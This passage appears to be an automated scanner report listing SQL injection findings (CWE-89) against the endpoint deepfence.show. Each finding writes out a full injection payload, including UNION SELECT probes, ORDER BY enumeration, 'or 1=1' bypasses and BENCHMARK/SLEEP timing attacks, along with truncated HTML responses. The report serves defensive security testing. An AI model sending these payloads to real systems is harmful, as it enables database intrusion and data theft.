Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1269\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# RANDOMBLOB(500000000/\n2)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1270\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1271\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1272\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1273\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 30--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1274\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1275\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1276\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1 AND (SELECT * FROM Users) =\n1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1277Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# 1)) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1278\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL\n,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1279\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1280\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1281\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or ''-'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1282\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 28#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 